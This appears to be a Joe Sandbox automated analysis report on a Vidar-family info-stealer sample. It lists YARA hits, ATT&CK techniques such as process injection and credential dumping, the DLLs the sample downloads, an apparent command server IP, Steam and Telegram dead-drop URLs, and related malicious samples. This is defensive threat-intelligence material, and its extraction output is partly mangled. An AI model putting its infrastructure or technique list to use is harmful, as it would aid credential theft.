                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7532, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                        Source: Yara match | File source: 0.2.file.exe.3eeac0.1.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.file.exe.3eeac0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.file.exe.3c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: file.exe PID: 7448, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7532, type: MEMORYSTR
                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 511 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                        Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 511 Process Injection | 1 Credentials in Registry | 141 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 12 Process Discovery | SMB/Windows Admin Shares | 4 Data from Local System | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Account Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
                        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 System Owner/User Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 3 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 54 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                        [Behavior graph] Behavior Graph ID: 1428826, Sample: file.exe, Startdate: 19/04/2024, Architecture: WINDOWS, Score: 100

                        Source | Detection | Scanner | Label | Link
                        file.exe | 100% | Avira | HEUR/AGEN.1352999
                        file.exe | 100% | Joe Sandbox ML
                        Source | Detection | Scanner | Label | Link
                        C:\ProgramData\freebl3.dll | 0% | ReversingLabs
                        C:\ProgramData\mozglue.dll | 0% | ReversingLabs
                        C:\ProgramData\msvcp140.dll | 0% | ReversingLabs
                        C:\ProgramData\nss3.dll | 0% | ReversingLabs
                        C:\ProgramData\softokn3.dll | 0% | ReversingLabs
                        C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll | 0% | ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll | 0% | ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll | 0% | ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll | 0% | ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll | 0% | ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll | 0% | ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll | 0% | ReversingLabs
                        No Antivirus matches
                        No Antivirus matches
                        Source | Detection | Scanner | Label | Link
                        https://mozilla.org0/ | 0% | URL Reputation | safe
                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        steamcommunity.com | 184.30.122.179 | true | false | | high
                        Name | Malicious | Antivirus Detection | Reputation
                        https://37.27.87.155/sqln.dll | false | | unknown
                        https://37.27.87.155/softokn3.dll | false | | unknown
                        https://37.27.87.155/nss3.dll | false | | unknown
                        https://37.27.87.155/vcruntime140.dll | false | | unknown
                        https://37.27.87.155/msvcp140.dll | false | | unknown
                        https://37.27.87.155/ | false | | unknown
                        https://37.27.87.155/freebl3.dll | false | | unknown
                        https://steamcommunity.com/profiles/76561199673019888 | false | | high
                        https://37.27.87.155/mozglue.dll | false | | unknown
                                                                                                                                        https://37.27.87.1550e3a617e50bnt-Disposition:RegAsm.exe, 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                          low
                                                                                                                                          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                            high
                                                                                                                                            https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                              high
                                                                                                                                              https://store.steampowered.com/about/76561199673019888[1].htm.5.drfalse
                                                                                                                                                high
                                                                                                                                                https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://t.me/irfailAtfile.exe, 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://37.27.87.155/:RegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFJJJDGIECFCAKKFHIIIJEGDHIIE.5.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://help.steampowered.com/en/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://steamcommunity.com/market/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://store.steampowered.com/news/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=GDHIEHJE.5.drfalse
                                                                                                                                                                high
                                                                                                                                                                http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegAsm.exe, 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp, CAFHIJDH.5.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://37.27.87.155/%RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://steamcommunity.com/discussions/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://store.steampowered.com/stats/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://37.27.87.155/ataRegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://37.27.87.155/QRegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://37.27.87.155AKEHIRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                                        low
                                                                                                                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallCAFHIJDH.5.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchGDHIEHJE.5.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://37.27.87.155/JRegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHly8&aRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://37.27.87.155/NRegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://37.27.87.155/nesRegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://steamcommunity.com/workshop/RegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://t.me/irfailfile.exe, file.exe, 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://37.27.87.155/BRegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://store.steampowered.com/legal/RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://www.sqlite.org/copyright.html.RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2071759889.0000000019E7D000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.5.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://37.27.87.155/CRegAsm.exe, 00000005.00000002.2066860045.000000000163C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoGDHIEHJE.5.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0file.exe, 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://37.27.87.15576561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://store.steampowered.com/76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwRegAsm.exe, 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.5.drfalse
                                                                                                                                                                                                                                high
IP | Domain | Country | ASN | ASN Name | Malicious
37.27.87.155 | unknown | Iran (ISLAMIC Republic Of) | 39232 | UNINETAZ | false
184.30.122.179 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1428826
Start date and time: 2024-04-19 17:07:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:file.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@10/25@1/2
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                • Number of executed functions: 96
                                                                                                                                                                                                                                • Number of non-executed functions: 189
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                • Stop behavior analysis, all processes terminated
                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • VT rate limit hit for: file.exe
Time | Type | Description
17:08:02 | API Interceptor | 1x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                37.27.87.155SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    184.30.122.179GCJlGRkySF.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                      7abf5ad882fd72332b0b7fb530c8c6505852d4f7ea39edfe444218bdcd9c7f0e_dump.exeGet hashmaliciousGlupteba, SmokeLoader, StealcBrowse
                                                                                                                                                                                                                                        kSfQIMr2tu.exeGet hashmaliciousGlupteba, Socks5Systemz, Stealc, VidarBrowse
                                                                                                                                                                                                                                          https://stk50.com/index-auth?openid.ns=mkbl5i04http://specs.openid.net/authGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            https://twitch-gamer.com/9wBu-authGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              https://skinboxs.com/simplenavi-authGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                https://s-teamg-nsp.com/p/wvc-jtrd/vrawqtgf/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  https://steamconnunitiy.ru/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    MEXTRAXT.exeGet hashmaliciousRisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                                                      1WExtract.exeGet hashmaliciousRisePro Stealer, VidarBrowse
                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        steamcommunity.comfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 23.76.43.59
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 23.76.43.59
                                                                                                                                                                                                                                                        SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                                        • 23.76.43.59
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 104.67.208.180
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 104.67.208.180
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 23.76.43.59
                                                                                                                                                                                                                                                        https://gtm.steamproxy.cc/sharedfiles/shareonsteam/?id=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 23.210.138.105
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 23.210.138.105
                                                                                                                                                                                                                                                        dUJqAYctYk.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 23.65.44.84
                                                                                                                                                                                                                                                        ss.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                                                                                                        • 104.105.90.131
                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        AKAMAI-ASUSppop_verification_request.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 184.31.60.185
                                                                                                                                                                                                                                                        order.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 23.208.128.100
                                                                                                                                                                                                                                                        H6ccnU1094.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                        • 104.120.66.73
                                                                                                                                                                                                                                                        https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5Get hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                        • 184.31.61.57
                                                                                                                                                                                                                                                        tA6etkt3gb.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                                                                                                                                                                                                                        • 23.44.104.130
                                                                                                                                                                                                                                                        BzmhHwFpCV.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 172.225.191.4
                                                                                                                                                                                                                                                        dPFRrhKTeG.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 88.221.207.232
                                                                                                                                                                                                                                                        0001.docGet hashmaliciousDynamerBrowse
                                                                                                                                                                                                                                                        • 23.44.104.130
                                                                                                                                                                                                                                                        PO_983888123.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 23.36.68.10
                                                                                                                                                                                                                                                        SA162.pdf.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 23.63.158.36
                                                                                                                                                                                                                                                        UNINETAZSecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                                                                                        • 37.27.87.155
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 37.27.87.155
                                                                                                                                                                                                                                                        4XAsw9FSr5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 37.27.255.7
                                                                                                                                                                                                                                                        77system.vbsGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                                                        • 37.27.30.181
                                                                                                                                                                                                                                                        aPu2pUmHzL.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 188.227.216.187
                                                                                                                                                                                                                                                        xjGg2eC75q.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        • 37.27.52.220
                                                                                                                                                                                                                                                        wsr3iUW0I0.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                        • 37.27.52.220
                                                                                                                                                                                                                                                        byGoj135nH.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Mars Stealer, Monster Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                        • 37.27.52.220
                                                                                                                                                                                                                                                        8uT94eNAur.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Mars Stealer, Monster Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                        • 37.27.52.220
                                                                                                                                                                                                                                                        rKYmlnOolQ.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                        • 37.27.52.220
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | Vidar | 37.27.87.155 |
| | file.exe | malicious | Vidar | 37.27.87.155 |
| | SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe | malicious | Phonk Miner, PureLog Stealer, Vidar | 37.27.87.155 |
| | file.exe | malicious | Vidar | 37.27.87.155 |
| | file.exe | malicious | Vidar | 37.27.87.155 |
| | file.exe | malicious | Vidar | 37.27.87.155 |
| | file.exe | malicious | Vidar | 37.27.87.155 |
| | Undetections.exe | malicious | Vidar | 37.27.87.155 |
| | SecuriteInfo.com.Win32.PWSX-gen.22336.13850.exe | malicious | Vidar | 37.27.87.155 |
| | UJzMs6lsyF.exe | malicious | Vidar | 37.27.87.155 |
| 37f463bf4616ecd445d4a1937da06e19 | Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs | malicious | AgentTesla, GuLoader | 184.30.122.179 |
| | eOU2MVDmTd.exe | malicious | CredGrabber, Meduza Stealer, PureLog Stealer, zgRAT | 184.30.122.179 |
| | SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe | malicious | CobaltStrike | 184.30.122.179 |
| | UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe | malicious | GuLoader, Remcos | 184.30.122.179 |
| | SecuriteInfo.com.Trojan.DownLoader40.42214.8350.4072.exe | malicious | Unknown | 184.30.122.179 |
| | SecuriteInfo.com.Trojan.DownLoader40.42214.8350.4072.exe | malicious | Unknown | 184.30.122.179 |
| | POTWIERDZENIE_TRANSAKCJI_20240418145856.exe | malicious | GuLoader | 184.30.122.179 |
| | eInvoicing_pdf.vbs | malicious | FormBook | 184.30.122.179 |
| | SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exe | malicious | PureLog Stealer | 184.30.122.179 |
| | SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exe | malicious | PureLog Stealer | 184.30.122.179 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| C:\ProgramData\freebl3.dll | SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe | malicious | LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer | |
| | file.exe | malicious | Vidar | |
| | file.exe | malicious | Vidar | |
| | LXoASvZRu1.exe | malicious | Mars Stealer, Stealc, Vidar | |
| | nXXx6yL69w.exe | malicious | Mars Stealer, Stealc, Vidar | |
| | SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe | malicious | Phonk Miner, PureLog Stealer, Vidar | |
| | Gpeym6icI3.exe | malicious | Mars Stealer, Stealc, Vidar | |
| | file.exe | malicious | Vidar | |
| | dc8laldmc8.exe | malicious | Mars Stealer, Stealc, Vidar | |
| | LB4129B9YX.exe | malicious | Mars Stealer, Stealc, Vidar | |
| C:\ProgramData\mozglue.dll | SecuriteInfo.com.Win64.Evo-gen.32634.31069.exe | malicious | LummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer | |
| | file.exe | malicious | Vidar | |
| | file.exe | malicious | Vidar | |
| | LXoASvZRu1.exe | malicious | Mars Stealer, Stealc, Vidar | |
| | nXXx6yL69w.exe | malicious | Mars Stealer, Stealc, Vidar | |
| | SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe | malicious | Phonk Miner, PureLog Stealer, Vidar | |
